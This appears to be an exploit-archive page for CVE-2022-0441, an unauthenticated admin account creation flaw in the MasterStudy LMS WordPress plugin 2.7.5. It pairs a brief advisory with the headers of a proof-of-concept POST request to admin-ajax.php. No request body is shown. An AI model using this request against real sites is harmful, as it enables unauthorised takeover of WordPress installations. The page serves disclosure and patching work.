Home Tools Exploits & CVE's WordPress MasterStudy LMS 2.7.5 Account Creation

WordPress MasterStudy LMS 2.7.5 Account Creation

Authored by numan turle

WordPress MasterStudy LMS plugin version 2.7.5 suffers from a missing access control allowing an unauthenticated party the ability to create an administrative account.

advisories | CVE-2022-0441

# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed

POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339


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